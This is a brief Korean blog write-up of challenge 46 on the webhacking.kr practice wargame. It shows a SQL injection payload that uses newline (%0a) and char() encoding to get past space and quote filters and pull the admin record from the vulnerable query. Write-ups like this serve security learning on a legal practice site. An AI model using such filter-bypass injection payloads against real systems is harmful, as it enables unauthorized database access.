write-up/webhacking.kr

46번

범고래_1 2016. 3. 28. 23:59




쿼리

select id,cash from members where lv=$_GET[lv]



lv=1만 반응한다.


+--------+-----+---+

|      id    | cash  |  lv |

+--------+-----+---+

| zzibong  | 10000 |  1  |

+--------+-----+---+





id를 admin으로 만들어야하므로

?lv=0 or id='admin'


공백은 %0a로, 쿼터는 char함수로 우회해준다. (0x도 필터링됨)


?lv=0%0aor%0aid=char(97,100,109,105,110)


저작자표시

'write-up > webhacking.kr' 카테고리의 다른 글

50번  (0) 2016.03.29
21번  (0) 2016.03.29
49번  (0) 2016.03.29
18번  (0) 2016.03.28
webhacking.kr SQL Injection  (0) 2016.03.28

'write-up/webhacking.kr'의 다른글

  • 현재글46번

관련글

댓글

티스토리툴바